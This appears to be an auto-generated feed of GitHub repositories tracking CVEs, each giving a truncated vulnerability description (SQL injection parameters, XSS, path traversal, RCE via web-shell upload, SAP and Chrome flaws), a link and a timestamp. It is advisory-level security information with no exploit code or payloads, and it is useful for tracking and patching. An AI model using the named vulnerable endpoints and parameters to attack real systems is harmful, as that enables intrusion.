**Inappropriate implementation in Permissions in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to tamper with the contents of the Omnibox (URL bar) via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0803](https://github.com/Live-Hack-CVE/CVE-2022-0803) create time: 2022-12-29T11:15:00Z

**Inappropriate implementation in Full screen mode in Google Chrome on Android prior to 99.0.4844.51 allowed a remote attacker to hide the contents of the Omnibox (URL bar) via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0802](https://github.com/Live-Hack-CVE/CVE-2022-0802) create time: 2022-12-29T11:14:56Z

**Inappropriate implementation in Full screen mode in Google Chrome on Android prior to 99.0.4844.51 allowed a remote attacker to hide the contents of the Omnibox (URL bar) via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0804](https://github.com/Live-Hack-CVE/CVE-2022-0804) create time: 2022-12-29T11:14:52Z

**Inappropriate implementation in Autofill in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0807](https://github.com/Live-Hack-CVE/CVE-2022-0807) create time: 2022-12-29T11:14:48Z

**A logic error in the Hints::Hints function of Poppler v22.03.0 allows attackers to cause a Denial of Service (DoS) via a crafted PDF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27337](https://github.com/Live-Hack-CVE/CVE-2022-27337) create time: 2022-12-29T11:14:41Z

**An issue was discovered in Gajim through 1.4.7. The vulnerability allows attackers, via crafted XML stanzas, to correct messages that were not sent by them. The attacker needs to be part of the group chat or single chat. The fixed version is 1.5.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39835](https://github.com/Live-Hack-CVE/CVE-2022-39835) create time: 2022-12-29T11:14:17Z

**Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/up_booking.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40353](https://github.com/Live-Hack-CVE/CVE-2022-40353) create time: 2022-12-29T11:14:13Z

**Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_booking.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40354](https://github.com/Live-Hack-CVE/CVE-2022-40354) create time: 2022-12-29T11:14:09Z

**Exam Reviewer Management System 1.0 is vulnerable to SQL Injection via the ‘id’ parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40877](https://github.com/Live-Hack-CVE/CVE-2022-40877) create time: 2022-12-29T11:14:06Z

**In Exam Reviewer Management System 1.0, an authenticated attacker can upload a web-shell php file in profile page to achieve Remote Code Execution (RCE). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40878](https://github.com/Live-Hack-CVE/CVE-2022-40878) create time: 2022-12-29T11:14:03Z

**An issue was discovered in EyesOfNetwork (EON) through 5.3.11. Unauthenticated SQL injection can occur. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41570](https://github.com/Live-Hack-CVE/CVE-2022-41570) create time: 2022-12-29T11:13:59Z

**An issue was discovered in EyesOfNetwork (EON) through 5.3.11. Local file inclusion can occur. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41571](https://github.com/Live-Hack-CVE/CVE-2022-41571) create time: 2022-12-29T11:13:56Z

**Cowell enterprise travel management system has insufficient filtering for special characters within web URL. An unauthenticated remote attacker can inject JavaScript and perform XSS (Reflected Cross-Site Scripting) attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39054](https://github.com/Live-Hack-CVE/CVE-2022-39054) create time: 2022-12-29T11:13:52Z

**Heimavista Rpage has insufficient filtering for platform web URL. An unauthenticated remote attacker can inject JavaScript and perform XSS (Reflected Cross-Site Scripting) attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39053](https://github.com/Live-Hack-CVE/CVE-2022-39053) create time: 2022-12-29T11:13:49Z

**A vulnerability classified as critical has been found in SourceCodester Food Ordering Management System. This affects an unknown part of the file router.php of the component POST Parameter Handler. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The expl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3332](https://github.com/Live-Hack-CVE/CVE-2022-3332) create time: 2022-12-29T11:13:45Z

**Smart eVision has a path traversal vulnerability in the Report API function due to insufficient filtering for special characters in URLs. A remote attacker with general user privilege can exploit this vulnerability to bypass authentication, access restricted paths and download system files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39034](https://github.com/Live-Hack-CVE/CVE-2022-39034) create time: 2022-12-29T11:13:42Z

**Smart eVision’s file acquisition function has a path traversal vulnerability due to insufficient filtering for special characters in the URL parameter. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication, access restricted paths to download and delete arbitrary system files to dis CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39033](https://github.com/Live-Hack-CVE/CVE-2022-39033) create time: 2022-12-29T11:13:20Z

**Smart eVision has an improper privilege management vulnerability. A remote attacker with general user privilege can exploit this vulnerability to escalate to administrator privilege, and then perform arbitrary system command or disrupt service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39032](https://github.com/Live-Hack-CVE/CVE-2022-39032) create time: 2022-12-29T11:13:16Z

**Smart eVision has insufficient authorization for task acquisition function. An unauthorized remote attacker can exploit this vulnerability to acquire the Session IDs of other general users only. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39031](https://github.com/Live-Hack-CVE/CVE-2022-39031) create time: 2022-12-29T11:13:13Z

**Use of Cache Containing Sensitive Information in GitHub repository ikus060/rdiffweb prior to 2.4.8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3292](https://github.com/Live-Hack-CVE/CVE-2022-3292) create time: 2022-12-29T11:13:08Z

**`@next-auth/upstash-redis-adapter` is the Upstash Redis adapter for NextAuth.js, which provides authentication for Next.js. Applications that use `next-auth` Email Provider and `@next-auth/upstash-redis-adapter` before v3.0.2 are affected by this vulnerability. The Upstash Redis adapter implementation did not check for CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39263](https://github.com/Live-Hack-CVE/CVE-2022-39263) create time: 2022-12-29T11:13:05Z

**Matrix iOS SDK allows developers to build iOS apps compatible with Matrix. Prior to version 0.23.19, an attacker cooperating with a malicious homeserver can construct messages appearing to have come from another person. Such messages will be marked with a grey shield on some platforms, but this may be missing in others CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39257](https://github.com/Live-Hack-CVE/CVE-2022-39257) create time: 2022-12-29T11:13:01Z

**Matrix iOS SDK allows developers to build iOS apps compatible with Matrix. Prior to version 0.23.19, an attacker cooperating with a malicious homeserver can construct messages that legitimately appear to have come from another person, without any indication such as a grey shield. Additionally, a sophisticated attacker CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39255](https://github.com/Live-Hack-CVE/CVE-2022-39255) create time: 2022-12-29T11:12:58Z

**Dell OS10, version 10.5.3.4, contains an Improper Certificate Validation vulnerability in Support Assist. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to unauthorized access to limited switch configuration data. The vulnerability could be leveraged by attackers to conduct man- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34394](https://github.com/Live-Hack-CVE/CVE-2022-34394) create time: 2022-12-29T11:12:54Z

**Dell Networking OS10, versions prior to October 2021 with Smart Fabric Services enabled, contains an information disclosure vulnerability. A remote, unauthenticated attacker could potentially exploit this vulnerability by reverse engineering to retrieve sensitive information and access the REST API with admin privilege CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29089](https://github.com/Live-Hack-CVE/CVE-2022-29089) create time: 2022-12-29T11:12:51Z

**Ampere Altra and Ampere Altra Max devices through 2022-07-15 allow attacks via Hertzbleed, which is a power side-channel attack that extracts secret information from the CPU by correlating the power consumption with data being processed on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35888](https://github.com/Live-Hack-CVE/CVE-2022-35888) create time: 2022-12-29T11:12:47Z

**Weak Password Requirements in GitHub repository ikus060/rdiffweb prior to 2.4.9. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3326](https://github.com/Live-Hack-CVE/CVE-2022-3326) create time: 2022-12-29T11:12:44Z

**Cross-site Scripting (XSS) - Stored in GitHub repository inventree/inventree prior to 0.8.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3355](https://github.com/Live-Hack-CVE/CVE-2022-3355) create time: 2022-12-29T11:12:39Z

**An Information Disclosure vulnerability exists in dhcms 2017-09-18 when entering invalid characters after the normal interface, which causes an error that will leak the physical path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19275](https://github.com/Live-Hack-CVE/CVE-2020-19275) create time: 2022-12-29T09:47:29Z

**Ingenico Telium 2 POS Telium2 OS allow bypass of file-reading restrictions via the NTPT3 protocol. This is fixed in Telium 2 SDK v9.32.03 patch N. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17766](https://github.com/Live-Hack-CVE/CVE-2018-17766) create time: 2022-12-29T09:42:22Z

**Ingenico Telium 2 POS terminals have undeclared TRACE protocol commands. This is fixed in Telium 2 SDK v9.32.03 patch N. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-17765](https://github.com/Live-Hack-CVE/CVE-2018-17765) create time: 2022-12-29T09:41:57Z

**Customizing functionality of SAP NetWeaver AS ABAP Platform (fixed in versions from 7.0 to 7.02, from 7.10 to 7.11, 7.30, 7.31, 7.40, from 7.50 to 7.53, from 7.74 to 7.75) does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-0257](https://github.com/Live-Hack-CVE/CVE-2019-0257) create time: 2022-12-29T09:51:36Z

**Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-3773](https://github.com/Live-Hack-CVE/CVE-2019-3773) create time: 2022-12-29T09:43:07Z

**In OpenJPEG 2.3.1, there is excessive iteration in the opj_t1_encode_cblks function of openjp2/t1.c. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted bmp file. This issue is similar to CVE-2018-6616. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-12973](https://github.com/Live-Hack-CVE/CVE-2019-12973) create time: 2022-12-29T09:43:04Z

**It was found that xstream API version 1.4.10 before 1.4.11 introduced a regression for a previous deserialization flaw. If the security framework has not been initialized, it may allow a remote attacker to run arbitrary shell commands when unmarshalling XML or any supported format. e.g. JSON. (regression of CVE-2013-72 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10173](https://github.com/Live-Hack-CVE/CVE-2019-10173) create time: 2022-12-29T09:43:00Z

**Including trailing white space in HTTP header values in Nodejs 10, 12, and 13 causes bypass of authorization based on header value comparisons CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15606](https://github.com/Live-Hack-CVE/CVE-2019-15606) create time: 2022-12-29T09:42:33Z

**SAP NetWeaver (ABAP Server) and ABAP Platform, versions 731, 740, 750, allows an attacker with admin privileges to access certain files which should otherwise be restricted, leading to Information Disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6280](https://github.com/Live-Hack-CVE/CVE-2020-6280) create time: 2022-12-29T09:53:16Z

**SAP NetWeaver (ABAP Server) and ABAP Platform, versions - 740, 750, 751, 752, 753, 754, 755, allows a business user to access the list of users in the given system using value help, leading to Information Disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6299](https://github.com/Live-Hack-CVE/CVE-2020-6299) create time: 2022-12-29T09:53:13Z

**Improper access control in SOA Configuration Trace component in SAP NetWeaver (ABAP Server) and ABAP Platform, versions - 702, 730, 731, 740, 750, allows any authenticated user to enumerate all SAP users, leading to Information Disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6310](https://github.com/Live-Hack-CVE/CVE-2020-6310) create time: 2022-12-29T09:53:09Z

**SAP Netweaver AS ABAP, versions 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, are vulnerable for Server Side Request Forgery Attack where in an attacker can use inappropriate path names containing malicious server names in the import/export of sessions functionality and coerce the web server into aut CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6275](https://github.com/Live-Hack-CVE/CVE-2020-6275) create time: 2022-12-29T09:53:05Z

**SAP NetWeaver (ABAP Server) and ABAP Platform, versions - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 753, 755, allows an attacker to inject code that can be executed by the application, leading to Code Injection. An attacker could thereby control the behavior of the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6296](https://github.com/Live-Hack-CVE/CVE-2020-6296) create time: 2022-12-29T09:53:02Z

**SAP NetWeaver AS ABAP (Banking Services), versions - 710, 711, 740, 750, 751, 752, 75A, 75B, 75C, 75D, 75E, does not perform necessary authorization checks for an authenticated user due to Missing Authorization Check, allowing wrong and unexpected change of individual conditions by a malicious user leading to wrong pri CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6270](https://github.com/Live-Hack-CVE/CVE-2020-6270) create time: 2022-12-29T09:52:58Z

**SAP NetWeaver AS ABAP (Web Dynpro ABAP), versions (SAP_UI 750, 752, 753, 754 and SAP_BASIS 700, 710, 730, 731, 804) allows an unauthenticated attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service leading to Denial of Service CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6240](https://github.com/Live-Hack-CVE/CVE-2020-6240) create time: 2022-12-29T09:52:55Z

**User enumeration vulnerability can be exploited to get a list of user accounts and personal user information can be exposed in SAP NetWeaver Application Server ABAP (POWL test application) versions - 710, 711, 730, 731, 740, 750, leading to Information Disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6371](https://github.com/Live-Hack-CVE/CVE-2020-6371) create time: 2022-12-29T09:52:51Z

**SAP NetWeaver AS ABAP (Web Dynpro), versions - 731, 740, 750, 751, 752, 753, 754, 755, 782, allows an authenticated user to access Web Dynpro components, which reveals sensitive system information that would otherwise be restricted to highly privileged users because of missing authorization, resulting in Information Di CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26818](https://github.com/Live-Hack-CVE/CVE-2020-26818) create time: 2022-12-29T09:52:48Z

**SAP NetWeaver AS ABAP (Web Dynpro), versions - 731, 740, 750, 751, 752, 753, 754, 755, 782, allows an authenticated user to access Web Dynpro components, that allows them to read and delete database logfiles because of Improper Access Control. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26819](https://github.com/Live-Hack-CVE/CVE-2020-26819) create time: 2022-12-29T09:52:40Z

**SAP NetWeaver AS ABAP, versions - 740, 750, 751, 752, 753, 754 , does not sufficiently encode URL which allows an attacker to input malicious java script in the URL which could be executed in the browser resulting in Reflected Cross-Site Scripting (XSS) vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26835](https://github.com/Live-Hack-CVE/CVE-2020-26835) create time: 2022-12-29T09:52:37Z

**SAP AS ABAP (SAP Landscape Transformation), versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020 and SAP S4 HANA (SAP Landscape Transformation), versions - 101, 102, 103, 104, 105, allows a high privileged user to execute a RFC function module to which access should be res CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26832](https://github.com/Live-Hack-CVE/CVE-2020-26832) create time: 2022-12-29T09:51:32Z

**A heap overflow vulnerability exists in Pixar OpenUSD 20.05 when the software parses compressed sections in binary USD files. A specially crafted USDC file format path jumps decompression heap overflow in a way path jumps are processed. To trigger this vulnerability, the victim needs to open an attacker-provided malfor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13493](https://github.com/Live-Hack-CVE/CVE-2020-13493) create time: 2022-12-29T09:51:04Z

**An issue in /app/system/column/admin/index.class.php of Metinfo v7.0.0 causes the indeximg parameter to be deleted when the column is deleted, allowing attackers to escalate privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19305](https://github.com/Live-Hack-CVE/CVE-2020-19305) create time: 2022-12-29T09:50:03Z

**A heap overflow vulnerability exists in the Pixar OpenUSD 20.05 parsing of compressed string tokens in binary USD files. A specially crafted malformed file can trigger a heap overflow which can result in out of bounds memory access which could lead to information disclosure. This vulnerability could be used to bypass m CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13494](https://github.com/Live-Hack-CVE/CVE-2020-13494) create time: 2022-12-29T09:49:59Z

**An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in macOS Big Sur 11.0.1, iOS 14.2 and iPadOS 14.2, tvOS 14.2, watchOS 7.1. A local attacker may be able to elevate their privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10003](https://github.com/Live-Hack-CVE/CVE-2020-10003) create time: 2022-12-29T09:49:55Z

**An exploitable vulnerability exists in the way Pixar OpenUSD 20.05 handles parses certain encoded types. A specially crafted malformed file can trigger an arbitrary out of bounds memory access in String Type Index. This vulnerability could be used to bypass mitigations and aid further exploitation. To trigger this vuln CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13497](https://github.com/Live-Hack-CVE/CVE-2020-13497) create time: 2022-12-29T09:49:45Z

**An information disclosure vulnerability exists in the Web Manager and telnet CLI functionality of Lantronix XPort EDGE 3.0.0.0R11, 3.1.0.0R9, 3.4.0.0R12 and 4.2.0.0R7. A specially crafted HTTP request can cause information disclosure. An attacker can sniff the network to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13528](https://github.com/Live-Hack-CVE/CVE-2020-13528) create time: 2022-12-29T09:49:42Z

**This issue was addressed with improved entitlements. This issue is fixed in macOS Big Sur 11.0.1. A malicious application may be able to access restricted files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10006](https://github.com/Live-Hack-CVE/CVE-2020-10006) create time: 2022-12-29T09:49:38Z

**MediaWiki before 1.35.1 allows XSS via BlockLogFormatter.php. MediaWiki:blanknamespace potentially can be output as raw HTML with SCRIPT tags via LogFormatter::makePageLink(). This affects MediaWiki 1.33.0 and later. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35478](https://github.com/Live-Hack-CVE/CVE-2020-35478) create time: 2022-12-29T09:49:04Z

**homee Brain Cube v2 (2.28.2 and 2.28.4) devices have sensitive SSH keys within downloadable and unencrypted firmware images. This allows remote attackers to use the support server as a SOCKS proxy. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24396](https://github.com/Live-Hack-CVE/CVE-2020-24396) create time: 2022-12-29T09:48:54Z

**An issue was discovered in Nitrokey FIDO U2F firmware through 1.1. Communication between the microcontroller and the secure element transmits credentials in plain. This allows an adversary to eavesdrop the communication and derive the secrets stored in the microcontroller. As a result, the attacker is able to arbitrari CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12061](https://github.com/Live-Hack-CVE/CVE-2020-12061) create time: 2022-12-29T09:48:50Z

**MediaWiki before 1.35.1 allows XSS via BlockLogFormatter.php. Language::translateBlockExpiry itself does not escape in all code paths. For example, the return of Language::userTimeAndDate is is always unsafe for HTML in a month value. This affects MediaWiki 1.12.0 and later. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35479](https://github.com/Live-Hack-CVE/CVE-2020-35479) create time: 2022-12-29T09:48:28Z

**MetInfo 7.0 beta is affected by a file modification vulnerability. Attackers can delete and modify ini files in app/system/language/admin/language_general.class.php and app/system/include/function/file.func.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20907](https://github.com/Live-Hack-CVE/CVE-2020-20907) create time: 2022-12-29T09:48:25Z

**Cross Site Request Forgery (CSRF) in JuQingCMS v1.0 allows remote attackers to gain local privileges via the component "JuQingCMS_v1.0/admin/index.php?c=administrator&a=add". CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-18648](https://github.com/Live-Hack-CVE/CVE-2020-18648) create time: 2022-12-29T09:48:21Z

**An exploitable SQL injection vulnerability exists in the "forms_fields_rules/rules" page of the Rukovoditel Project Management App 2.7.2. A specially crafted HTTP request can lead to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability, this can be done either with administrat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13587](https://github.com/Live-Hack-CVE/CVE-2020-13587) create time: 2022-12-29T09:48:17Z

**An exploitable SQL injection vulnerability exists in the "access_rules/rules_form" page of the Rukovoditel Project Management App 2.7.2. A specially crafted HTTP request can lead to SQL injection. An attacker can make an authenticated HTTP request to trigger this vulnerability, this can be done either with administrato CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13591](https://github.com/Live-Hack-CVE/CVE-2020-13591) create time: 2022-12-29T09:48:10Z

**The web console for Mimosa B5, B5c, and C5x firmware through 2.8.0.2 allows authenticated command injection in the Throughput, WANStats, PhyStats, and QosStats API classes. An attacker with access to a web console account may execute operating system commands on affected devices by sending crafted POST requests to the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25206](https://github.com/Live-Hack-CVE/CVE-2020-25206) create time: 2022-12-29T09:48:04Z

**Incorrect Access Control vulnerability in Online Book Store v1.0 via admin_verify.php, which could let a remote mailicious user bypass authentication and obtain sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19111](https://github.com/Live-Hack-CVE/CVE-2020-19111) create time: 2022-12-29T09:47:53Z

**Incorrect Access Control in Shopxo v1.4.0 and v1.5.0 allows remote attackers to gain privileges in "/index.php" by manipulating the parameter "user_id" in the HTML request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19778](https://github.com/Live-Hack-CVE/CVE-2020-19778) create time: 2022-12-29T09:47:50Z

**SAP NetWeaver AS ABAP, versions 740, 750, 751, 752, 753, 754, 755, allows an unauthenticated attacker to prevent legitimate users from accessing a service, either by crashing or flooding the service, this has a high impact on the availability of the service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21446](https://github.com/Live-Hack-CVE/CVE-2021-21446) create time: 2022-12-29T09:52:32Z

**An RFC enabled function module SPI_WAIT_MILLIS in SAP NetWeaver AS ABAP, versions - 731, 740, 750, allows to keep a work process busy for any length of time. An attacker could call this function module multiple times to block all work processes thereby causing Denial of Service and affecting the Availability of the SAP CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27603](https://github.com/Live-Hack-CVE/CVE-2021-27603) create time: 2022-12-29T09:52:28Z

**SAP NetWeaver AS ABAP, versions - 700, 701, 702, 730, 731, allow a high privileged attacker to inject malicious code by executing an ABAP report when the attacker has access to the local SAP system. The attacker could then get access to data, overwrite them, or execute a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27611](https://github.com/Live-Hack-CVE/CVE-2021-27611) create time: 2022-12-29T09:52:11Z

**SAP NetWeaver AS ABAP, versions - KRNL32NUC - 7.22,7.22EXT, KRNL32UC - 7.22,7.22EXT, KRNL64NUC - 7.22,7.22EXT,7.49, KRNL64UC - 8.04,7.22,7.22EXT,7.49,7.53,7.73, KERNEL - 7.22,8.04,7.49,7.53,7.73,7.77,7.81,7.82,7.83,7.84, allows an unauthorized attacker to insert cleartext commands due to improper restriction of I/O buf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33663](https://github.com/Live-Hack-CVE/CVE-2021-33663) create time: 2022-12-29T09:52:08Z

**SAP NetWeaver AS for ABAP (Web Survey), versions - 700, 702, 710, 711, 730, 731, 750, 750, 752, 75A, 75F, does not sufficiently encode input and output parameters which results in reflected cross site scripting vulnerability, through which a malicious user can access data relating to the current session and use it to i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21490](https://github.com/Live-Hack-CVE/CVE-2021-21490) create time: 2022-12-29T09:52:04Z

**SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21473](https://github.com/Live-Hack-CVE/CVE-2021-21473) create time: 2022-12-29T09:52:01Z

**A function module of SAP NetWeaver AS ABAP (Reconciliation Framework), versions - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 75A, 75B, 75B, 75C, 75D, 75E, 75F, allows a high privileged attacker to inject code that can be executed by the application. An attacker could thereby delete some critical information CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33678](https://github.com/Live-Hack-CVE/CVE-2021-33678) create time: 2022-12-29T09:51:57Z

**Internally used text extraction reports allow an attacker to inject code that can be executed by the application. An attacker could thereby control the behavior of the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44231](https://github.com/Live-Hack-CVE/CVE-2021-44231) create time: 2022-12-29T09:51:53Z

**Specially-crafted HTTP requests can lead to arbitrary command execution in PUT requests. An attacker can make authenticated HTTP requests to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21876](https://github.com/Live-Hack-CVE/CVE-2021-21876) create time: 2022-12-29T09:51:19Z

**Specially-crafted HTTP requests can lead to arbitrary command execution in “GET” requests. An attacker can make authenticated HTTP requests to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21877](https://github.com/Live-Hack-CVE/CVE-2021-21877) create time: 2022-12-29T09:51:15Z

**An issue was discovered in Wind River VxWorks before 6.5. There is a possible heap overflow in dhcp client. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29998](https://github.com/Live-Hack-CVE/CVE-2021-29998) create time: 2022-12-29T09:47:43Z

**A privilege escalation vulnerability exists in the Windows version of installation for Advantech R-SeeNet Advantech R-SeeNet 2.4.15 (30.07.2021). A specially-crafted file can be replaced in the system to escalate privileges to NT SYSTEM authority. An attacker can provide a malicious file to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21912](https://github.com/Live-Hack-CVE/CVE-2021-21912) create time: 2022-12-29T09:46:17Z

**JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4104](https://github.com/Live-Hack-CVE/CVE-2021-4104) create time: 2022-12-29T09:45:37Z

**The Snappy frame decoder function doesn't restrict the chunk length which may lead to excessive memory usage. Beside this it also may buffer reserved skippable chunks until the whole chunk was received which may lead to excessive memory usage as well. This vulnerability can be triggered by supplying malicious input tha CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37137](https://github.com/Live-Hack-CVE/CVE-2021-37137) create time: 2022-12-29T09:45:33Z

**It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42013](https://github.com/Live-Hack-CVE/CVE-2021-42013) create time: 2022-12-29T09:45:29Z

**Some components in Apache Kafka use `Arrays.equals` to validate a password or key, which is vulnerable to timing attacks that make brute force attacks for such credentials more likely to be successful. Users should upgrade to 2.8.1 or higher, or 3.0.0 or higher where this vulnerability has been fixed. The affected vers CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38153](https://github.com/Live-Hack-CVE/CVE-2021-38153) create time: 2022-12-29T09:45:22Z

**A flaw was found in the QEMU implementation of VMWare's paravirtual RDMA device. The issue occurs while handling a "PVRDMA_CMD_CREATE_MR" command due to improper memory remapping (mremap). This flaw allows a malicious guest to crash the QEMU process on the host. The highest threat from this vulnerability is to system a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3582](https://github.com/Live-Hack-CVE/CVE-2021-3582) create time: 2022-12-29T09:45:11Z

**An unprivileged write to the file handler flaw in the Linux kernel's control groups and namespaces subsystem was found in the way users have access to some less privileged process that are controlled by cgroups and have higher privileged parent process. It is actually both for cgroup2 and cgroup1 versions of control gr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4197](https://github.com/Live-Hack-CVE/CVE-2021-4197) create time: 2022-12-29T09:44:53Z

**An Unquoted Service Path vulnerablility exists in Rumble Mail Server 0.51.3135 via via a specially crafted file in the RumbleService executable service path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43456](https://github.com/Live-Hack-CVE/CVE-2021-43456) create time: 2022-12-29T09:43:14Z

**A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the username parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43462](https://github.com/Live-Hack-CVE/CVE-2021-43462) create time: 2022-12-29T09:43:11Z

